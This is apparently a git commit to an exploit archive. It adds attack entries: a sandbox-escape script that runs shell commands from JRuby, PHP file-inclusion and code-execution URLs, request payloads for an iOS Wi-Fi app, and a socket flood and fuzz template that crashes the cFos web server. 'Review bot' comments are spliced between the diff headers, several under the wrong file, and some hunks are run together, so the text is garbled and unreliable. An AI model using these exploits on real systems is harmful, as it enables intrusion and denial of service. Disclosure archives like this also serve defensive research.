From a6e2fc14616cb8436bfb44307266e111b3f95176 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 27 Apr 2014 04:36:25 +0000
Subject: [PATCH] Updated 04_27_2014

---
 files.csv | 7 +
 platforms/ios/webapps/33026.txt | 319 +++++++++++++++++++++++++++++
 platforms/linux/dos/33017.txt | 11 +
 platforms/linux/local/33028.txt | 51 +++++
 platforms/php/webapps/33030.txt | 34 +++
 platforms/windows/dos/33018.txt | 163 +++++++++++++++
 platforms/windows/remote/33024.txt | 7 +
 platforms/windows/remote/33027.py | 77 +++++++
 8 files changed, 669 insertions(+)
 create mode 100755 platforms/ios/webapps/33026.txt
 create mode 100755 platforms/linux/dos/33017.txt
 create mode 100755 platforms/linux/local/33028.txt
 create mode 100755 platforms/php/webapps/33030.txt
 create mode 100755 platforms/windows/dos/33018.txt
 create mode 100755 platforms/windows/remote/33024.txt
 create mode 100755 platforms/windows/remote/33027.py

diff --git a/files.csv b/files.csv
index 15c43c928..4c3e1489e 100755
--- a/files.csv
+++ b/files.csv
@@ -29760,8 +29760,15 @@ id,file,description,date,author,platform,type,port
 33014,platforms/php/webapps/33014.txt,"Achievo <= 1.3.4 Multiple Cross Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0
 33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x 'splice(2)' Double Lock Local Denial of Service Vulnerability",2009-05-29,"Miklos Szeredi",linux,dos,0
 33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String Vulnerability",2009-05-29,"Patrick Webster",hardware,remote,0
+33017,platforms/linux/dos/33017.txt,"Adobe Acrobat <= 9.1.3 - Stack Exhaustion Denial of Service Vulnerability",2009-05-29,"Saint Patrick",linux,dos,0
+33018,platforms/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption Denial of Service",2014-04-25,LiquidWorm,windows,dos,0
 33020,platforms/linux/dos/33020.py,"CUPS <= 1.3.9 'cups/ipp.c' NULL Pointer Dereference Denial Of Service Vulnerability",2009-06-02,"Anibal Sacco",linux,dos,0
 33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross Site Scripting Vulnerability",2009-06-02,"Schap Security",php,webapps,0
 33022,platforms/php/webapps/33022.txt,"Joomla! Prior to 1.5.11 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0
 33023,platforms/multiple/remote/33023.txt,"Apache Tomcat <= 6.0.18 Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0
+33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure Vulnerability",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0
 33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 'cfgadvanced.html' HTTP Header Injection Vulnerability",2009-06-05,Inferno,windows,remote,0
+33026,platforms/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps,0
+33027,platforms/windows/remote/33027.py,"Kolibri 2.0 GET Request - Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80
+33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0
+33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerability (LFI/RCE)",2014-04-26,"jiko jawad",php,webapps,0
diff --git a/platforms/ios/webapps/33026.txt b/platforms/ios/webapps/33026.txt
new file mode 100755
index 000000000..a95e94046
--- /dev/null
+++ b/platforms/ios/webapps/33026.txt
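Review bot: The new 33017 row describes the Adobe Acrobat issue as `<= 9.1.3`, but the advisory text added by this same commit in platforms/linux/dos/33017.txt only states that 9.1.1 is vulnerable and that other versions "may" be affected, so the index asserts a wider affected range than its own source; either cite where 9.1.3 comes from or narrow the description to `"Adobe Acrobat 9.1.1 - Stack Exhaustion Denial of Service Vulnerability"`. The 33030 row uses the singular `Multiple Vulnerability` where the neighbouring rows consistently say `Multiple Vulnerabilities`. Both are index-only changes and do not affect the exploit files themselves.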
@@ -0,0 +1,319 @@ +Document Title: +=============== +Depot WiFi v1.0.0 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1259 + + +Release Date: +============= +2014-04-23 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1259 + + +Common Vulnerability Scoring System: +==================================== +8.6 + + +Product & Service Introduction: +=============================== +With Depot you can archive all kinds of files on your iPhone, iPod or iPad and then share them on a local WiFi network +In Depot not only you can receive files from other applications that supports document interaction (as Mail or Safari), +but you can also download and upload files from any kind of PC and internet enabled devices. You can then open your files +directly on your device or share them between other devices such as smartphones, tablets, PCs, game consoles and smart TVs +connected through a local WiFi. + +(Copy of the Homepage: https://itunes.apple.com/br/app/depot/id858248612 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Depot v1.0.0 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2014-04-23: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Maurizio Berioli +Product: Depot - iOS Mobile Application 1.0 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +1.1 +A local file include web vulnerability has been discovered in the official Depot v1.0.0 iOS mobile web-application. 
The local file include +web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise +the mobile web-application. + +The web vulnerability is located in the `filename` value of the `+Files > Upload!` module. Remote attackers are able to inject own files with +malicious `filename` values in the `Upload!` POST method request to compromise the mobile web-application. The local file/path include execution +occurs in the `Depot index item list` context of the wifi interface. Attackers are able to inject own local file requests by usage of the `wifi interface` +path value or by a local privileged device user account via `filename sync` rename. + +Remote attackers are also able to exploit the filename validation issue in combination with persistent script codes to execute different local malicious +attacks or requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. The security risk of the +local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. + +Exploitation of the local file include web vulnerability requires no privileged application user account or user interaction. Successful exploitation of +the local file include web vulnerability results in mobile application or connected device component compromise. + + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] +File > Upload! + +Vulnerable Function(s): + [+] Create a new Folder (remote) + [+] rename (local sync) + +Vulnerable Parameter(s): + [+] filename (path value) + +Affected Module(s): + [+] Depot Index Item Listing (http://localhost/) + + + + +1.2 +A code execution web vulnerability has been discovered in the official Depot v1.0.0 iOS mobile web-application. 
The issue allows an attacker to +compromise the application and connected device components by exploitation of system specific code execution vulnerability in the webdisk interface. + +The vulnerability is located in the GET method request of the `+Folders` module. The main index provides a folders add form which is not secure +encoding the regular inputs. The context can be implemented to the folders form and the results is the application-side execution of system +specific malicious codes in the index. The file itself will not be transfered and the input generates the listing context to the index. + +The input field of the +Folders module executes the wrong encoded input via GET method request by the name value. Remote attackers are able to +execute the own malicious codes by usage of a script code payload in combination with the affected system device values. The execution of the code +occurs in the main depot file dir listing context. The attack vector is on application-side and the request method to attack the service is GET. +The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.9. + +Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction. +Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise. + + +Request Method(s): + [+] POST + +Vulnerable Module(s): + [+] +Folders + +Vulnerable Function(s): + [+] Create a new Folder (remote) + [+] rename (local sync) + +Vulnerable Parameter(s): + [+] foldername + +Affected Module(s): + [+] Depot Index Item Listing (http://localhost/) + + +Proof of Concept (PoC): +======================= +1.1 +The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction. 
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + +PoC: Exploit Filename Index + +
+Name
Date
+
Size
+ +./var/x/[LOCAL FILE INCLUDE VULNERABILITY].test.png + 22.04.2014 11:37 538.00bytes + + +--- POC SESSION LOGS [POST] --- +Status: 200[OK] +GET http://localhost:80/?addfile=1 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2924] Mime Type[text/html] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 (Windows NT + +6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer + +[http://localhost:80/] + Connection[keep-alive] + Response Header: + Content-Type[text/html] + Content-Length[2924] + Connection[close] + Cache-Control[no-cache] + + +Status: 200[OK] +POST http://localhost:80/ Load Flags + +[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2920] Mime Type[text/html] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + + +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:80/?addfile=1] + Connection[keep-alive] + POST- + +Daten: + POST_DATA[-----------------------------2914547563213 +Content-Disposition: form-data; name="mauber"; filename="./var/x/[LOCAL FILE INCLUDE VULNERABILITY].test.png" +Content-Type: image/png + + +Reference(s): +http://localhost:80/?addfile= + + + +1.2 +The code execution web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +PoC #1: Exploit Index Foldername Item + +
Folders [+]
>"%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C" <="" created!<="" div="">
Name
Date
[.deviceMedia.] - + + [%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C) <] + + +PoC #2: Exploit #2 Directory/Path Value + +<< Browsing:[/][>"<%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C)" <<="" a="">] +
+
+Folders [+]
No sub-folders presents.
Files [ ++]
No files present.
+ + +--- POC SESSION LOGS [GET] --- + +GET http://localhost:80/.createdir?newdir=%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C Load Flags[LOAD_FROM_CACHE ] Gr??e des Inhalts[-1] Mime Type[unbekannt] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 + +(Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer + +[http://localhost:80/?adddir=1] + Response Header: + + +11:15:44.105[31ms][total 31ms] Status: 200[OK] +GET http://localhost:80/%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[48] Mime Type + +[text/html] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept- + +Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:80/] + Connection[keep-alive] + Response Header: + Content-Type[text/html] + Content-Length[48] + Connection[close] +Cache-Control[no-cache] + + + +Reference(s): +http://localhost:80/.createdir?newdir= + + +Security Risk: +============== +1.1 +The security risk of the local file include web vulnerability is estimated as high. + +1.2 +The security risk of the code execution web vulnerability is estimated as high(+). + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + 
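Review bot: Section 1.2 is labelled a "code execution web vulnerability" with a CVSS of 8.9, but the only evidence shown is the `newdir` value from `GET http://localhost:80/.createdir?newdir=%3E%22%3C.[...]+%3C` being rendered back unescaped into the directory listing (the `>"<` fragments visible in the PoC markup); that is a persistent HTML/script injection in the WiFi web interface, not execution of code on the device, and the "Security Risk" and CVSS lines should say so. Section 1.1 likewise shows a multipart `filename="./var/x/[...].test.png"` being echoed into the index listing, but nothing in the session log demonstrates that a file outside the share is read or included, so "local file include" is not supported by the PoC as written and would be more accurately described as a filename/path-validation (traversal) issue unless an out-of-tree read is shown. The advisory also contradicts itself: 1.2 lists the request method as `[+] POST` while its own session log is a GET, and three different CVSS values (8.6 in the header, 6.9 in 1.1, 8.9 in 1.2) are given for the same two findings.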
diff --git a/platforms/linux/dos/33017.txt b/platforms/linux/dos/33017.txt
new file mode 100755
index 000000000..c4eb23627
--- /dev/null
+++ b/platforms/linux/dos/33017.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/35148/info
+
+Adobe Acrobat is prone to a denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit this issue to cause the affected application to crash, effectively denying service. Attackers may also be able to execute arbitrary code, but this has not been confirmed.
+
+Acrobat 9.1.1 is vulnerable; other versions may also be affected.
+
+NOTE: This BID was previously classified as a buffer-overflow issue, but further analysis reveals that it is a stack-exhaustion issue. Code execution is unlikely.
+
+http://www.exploit-db.com/sploits/33017.pdf
\ No newline at end of file
diff --git a/platforms/linux/local/33028.txt b/platforms/linux/local/33028.txt
new file mode 100755
index 000000000..307eafebe
--- /dev/null
+++ b/platforms/linux/local/33028.txt
@@ -0,0 +1,51 @@
+Phenoelit Advisory
+
+[ Authors ]
+ joernchen
+
+ Phenoelit Group (http://www.phenoelit.de)
+
+[ Affected Products ]
+ jruby-sandbox <= 0.2.2
+ https://github.com/omghax/jruby-sandbox
+
+[ Vendor communication ]
+ 2014-04-22 Send vulnerability details to project maintainer
+ 2014-04-24 Requesting confirmation that details were received
+ 2014-04-24 Maintainer states he is working on a test case
+ 2014-04-24 Maintainer releases fixed version
+ 2014-04-24 Release of this advisory
+
+[ Description ]
+ jruby-sandbox aims to allow safe execution of user given Ruby
+ code within a JRuby [0] runtime. However via import of Java
+ classes it is possible to circumvent those protections and
+ execute arbitrary code outside the sandboxed environment.
+
+[ Example ]
+
+require 'sandbox'
+sand = Sandbox.safe
+sand.activate!
+
+begin
+ sand.eval("print `id`")
+rescue Exception => e
+ puts "fail via Ruby ;)"
+end
+puts "Now for some Java"
+
+sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'")
+sand.eval("Kernel.send :java_import, 'java.util.Scanner'")
+sand.eval("s = Java::java.util.Scanner.new( " +
+ "Java::java.lang.ProcessBuilder.new('sh','-c','id')" +
+ ".start.getInputStream ).useDelimiter(\"\x00\").next")
+sand.eval("print s")
+
+[ Solution ]
+ Upgrade to version 0.2.3
+
+[ References ]
+ [0] http://jruby.org/
+
+[ end of file ]
\ No newline at end of file
diff --git a/platforms/php/webapps/33030.txt b/platforms/php/webapps/33030.txt
new file mode 100755
index 000000000..91e34f7bb
--- /dev/null
+++ b/platforms/php/webapps/33030.txt
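Review bot: The Solution section reduces to `Upgrade to version 0.2.3`, but the technique shown — reaching a Java class from inside `sand.eval` via `Kernel.send :java_import, 'java.lang.ProcessBuilder'` — works because the sandboxed Ruby runs in the same JVM as the host, so blocking this particular import closes one path rather than the class of problem; the advisory should caveat that jruby-sandbox is not a trust boundary for hostile code and should be paired with JVM-level policy or process isolation. In the example, `rescue Exception => e` swallows every failure including `LoadError`, so `fail via Ruby ;)` would print even when the sandbox is not installed rather than only when it refused the backtick call; rescuing the specific error the sandbox raises (presumably a `SecurityError`, to be confirmed against the gem) would make the first half of the demo prove what it claims. The bound `e` is also never used.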
@@ -0,0 +1,34 @@
+----------[exploit Debut]
+[Multiple Vulnerability]
+----------[Script Info]
+
+Moi : JIKO
+Site : No-exploit.Com
+
+
+----------[Script Info]
+
+Site : http://www.apphp.com
+Download : http://www.apphp.com/downloads_free/php_microblog_101.zip
+
+----------[exploit Info]
+
+~[RCE]
+http://path/index.php?jiko);system((dir)=/
+~[LFI]
+http://path/index.php?index.php?page=FILE%00 (you need to baypass the filter)
+http://path/index.php?index.php?admin=FILE%00 (you need to baypass the filter)
+
+if (($page != "") && file_exists("page/" . $page . ".php")) {
+ include_once("page/" . $page .
+
+".php");
+ } else if (($admin != "") &&
+
+file_exists("admin/" . $admin . ".php")) {
+ include_once("admin/" . $admin
+
+. ".php");
+ }
+----------[exploit Fin]
+
\ No newline at end of file
diff --git a/platforms/windows/dos/33018.txt b/platforms/windows/dos/33018.txt
new file mode 100755
index 000000000..2fbe44259
--- /dev/null
+++ b/platforms/windows/dos/33018.txt
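Review bot: The `~[RCE]` line `http://path/index.php?jiko);system((dir)=/` names no parameter and no sink, and nothing in the quoted PHP passes a string to `eval`, `system` or `preg_replace`, so the RCE claim cannot be reproduced or verified from this file; the entry should quote the vulnerable line or drop the RCE label. The LFI URLs depend on a trailing `%00` truncating the `.php` suffix appended in `include_once("page/" . $page . ".php")`, which only works on PHP before 5.3.4 (later releases refuse include paths containing NUL), and the "filter" that the `you need to baypass the filter` note refers to is not shown anywhere in the snippet, so readers cannot tell what must be bypassed. The part of the quoted code that does support an LFI is that `file_exists()` is the only guard and does nothing against `../` traversal; stating that explicitly would make the finding stand on its own.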
@@ -0,0 +1,163 @@ +?cFos Personal Net v3.09 Remote Heap Memory Corruption Denial of Service + + +Vendor: cFos Software GmbH +Product web page: https://www.cfos.de +Affected version: 3.09 + +Summary: cFos Personal Net (PNet) is a full-featured HTTP server intended for +personal and professional use. For personal use, instead of hosting websites +with a webhoster, you just run it on your Windows machine. For professional +use, you rent a virtual windows PC or dedicated PC from a webhoster and run +it there. + +Desc: cFos Personal Net web server is vulnerable to a remote denial of service +issue when processing multiple malformed POST requests in less than 3000ms. +The issue occurs when the application fails to handle the data sent in the +POST requests in a single socket connection causing heap memory corruption +which results in a crash of the HTTP service. + +SHODAN: cFos Personal Net v3.09 Microsoft-HTTPAPI/2.0 + +============================================================================ + +(658.1448): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Module load completed but symbols could not be loaded for cfospnet.exe +eax=feeefeee ebx=02813dcc ecx=02813dcc edx=00000000 esi=028198b0 edi=02813c88 +eip=00914529 esp=03b1fb94 ebp=03b1fbb8 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +cfospnet+0x54529: +00914529 ff5004 call dword ptr [eax+4] ds:002b:feeefef2=???????? +0:024> d ecx +02813dcc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813ddc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813dec ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813dfc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e0c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ 
+02813e1c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e2c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e3c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0:024> d +02813e4c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e5c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e6c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e7c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e8c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e9c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813eac ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813ebc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0:024> d +02813ecc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813edc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813eec ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813efc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813f0c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813f1c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813f2c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813f3c ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21 .............f.! +0:024> d +02813f4c 8e e8 06 18 d0 71 2d 04-c0 f8 80 02 d0 71 2d 04 .....q-......q-. +02813f5c 01 00 ad ba 5f 43 46 50-4e 45 54 5f 50 41 54 48 ...._CFPNET_PATH +02813f6c 00 f0 ad ba 0c 00 00 00-0f 00 00 00 90 41 2c 04 .............A,. +02813f7c 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 29 00 00 00 ............)... +02813f8c 2f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00 /............... +02813f9c 00 00 00 00 aa 66 9a 38-dc e8 06 00 10 31 2c 04 .....f.8.....1,. +02813fac d0 0c 81 02 ee fe ee fe-ee fe ee fe ee fe ee fe ................ 
+02813fbc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0:024> d +02813fcc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813fdc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813fec ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813ffc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281400c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281401c ee fe ee fe ee fe ee fe-ee fe ee fe be 66 99 2f .............f./ +0281402c c6 e8 06 18 0a 00 00 00-6e 00 61 00 6d 00 65 00 ........n.a.m.e. +0281403c 3d 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00 =............... +0:024> d +0281404c 00 00 00 00 b0 66 9a 22-d2 e8 06 00 60 8b 80 02 .....f."....`... +0281405c 10 c9 2b 04 ee fe ee fe-ee fe ee fe ee fe ee fe ..+............. +0281406c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281407c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281408c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281409c ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21 .............f.! +028140ac dc e8 06 18 e8 08 81 02-30 37 86 02 c0 4b 81 02 ........07...K.. +028140bc 00 00 ad ba 52 45 51 55-45 53 54 5f 55 52 49 00 ....REQUEST_URI. +0:024> d +028140cc 0d f0 ad ba 0b 00 00 00-0f 00 00 00 08 41 81 02 .............A.. +028140dc 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 1d 00 00 00 ................ +028140ec 1f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00 ................ +028140fc 00 00 00 00 bc 66 99 2d-dc e8 06 18 2f 73 63 72 .....f.-..../scr +0281410c 69 70 74 73 2f 67 65 74-5f 73 65 72 76 65 72 5f ipts/get_server_ +0281411c 73 74 61 74 73 2e 6a 73-73 00 ad ba ab ab ab ab stats.jss....... +0281412c ab ab ab ab 00 00 00 00-00 00 00 00 ad 66 9a 3f .............f.? +0281413c d0 e8 06 00 c8 4a 2c 04-f0 18 2d 04 ee fe ee fe .....J,...-..... +0:024> d +0281414c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ 
+0281415c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281416c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281417c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281418c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281419c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +028141ac ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +028141bc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0:024> d esi +028198b0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +028198c0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +028198d0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +028198e0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +028198f0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +02819900 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +02819910 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +02819920 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ 
+ +============================================================================ + + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5184 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5184.php + + +01.04.2014 + +--- + + +-ALGjlang + + open_socket(); for(j=1;j<=30;j++) + { + send_socket(" + POST /scripts/get_server_stats.jss?name= HTTP/1.1 + User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) + Accept: */* + Host: 192.168.0.107 + Content-Length: 20 + + AAAAAAAAAAAAAAAAAA\x0d\x0a\x0d\x0a + ") } close_socket(); + + +-SPKfzz + + s_string("POST /scripts/get_server_stats.jss?name= HTTP/1.1\r\n"); + s_string("User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\n"); + s_string("Accept: */*"); + s_string("Host: 192.168.0.107\r\n"); + s_string("Content-Length: "); + s_blocksize_string("fuzz",15); + s_string("\r\n\r\n"); + + s_block_start("fuzz"); + s_string("joxypoxyjoxypoxy!!\r\n\" * 100); + s_string_variable("ZSL"); + s_string("\r\n"); //importante + s_block_end("fuzz"); diff --git a/platforms/windows/remote/33024.txt b/platforms/windows/remote/33024.txt new file mode 100755 index 000000000..47eb497aa --- /dev/null +++ b/platforms/windows/remote/33024.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/35200/info + +Microsoft Internet Explorer is prone to a cross-domain information-disclosure vulnerability because the application fails to properly enforce the same-origin policy. + +An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information or may aid in further attacks. + +http://www.exploit-db.com/sploits/33024.zip \ No newline at end of file diff --git a/platforms/windows/remote/33027.py b/platforms/windows/remote/33027.py new file mode 100755 index 000000000..eae5cd697 --- /dev/null 
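Review bot: The SPIKE template in the `-SPKfzz` block emits `s_string("Accept: */*");` with no `\r\n`, so the Accept and Host headers go out as a single line (`Accept: */*Host: 192.168.0.107`) and the reproduction does not send the request the description talks about; it should be `s_string("Accept: */*\r\n");`. The crash also deserves a stronger classification than plain DoS: the faulting instruction is `call dword ptr [eax+4]` with `eax=feeefeee` and the object at `ecx` filled with `ee fe ee fe`, which is the Windows debug heap's freed-block fill, so this looks like an indirect call through an already-freed object rather than generic corruption, and without the debug heap the freed slot could hold attacker-influenced data. The `0d f0 ad ba` (`baadf00d`) fill at `esi` confirms the run was under the debug heap, which should be recorded next to the `Tested on:` line, and the advisory should say that exploitability beyond denial of service was not ruled out.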
+++ b/platforms/windows/remote/33027.py 
@@ -0,0 +1,77 @@
+#!/usr/bin/python
+# Exploit Title: Kolibri GET request Stack buffer Overflow
+# Date: 25 April 2014
+# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
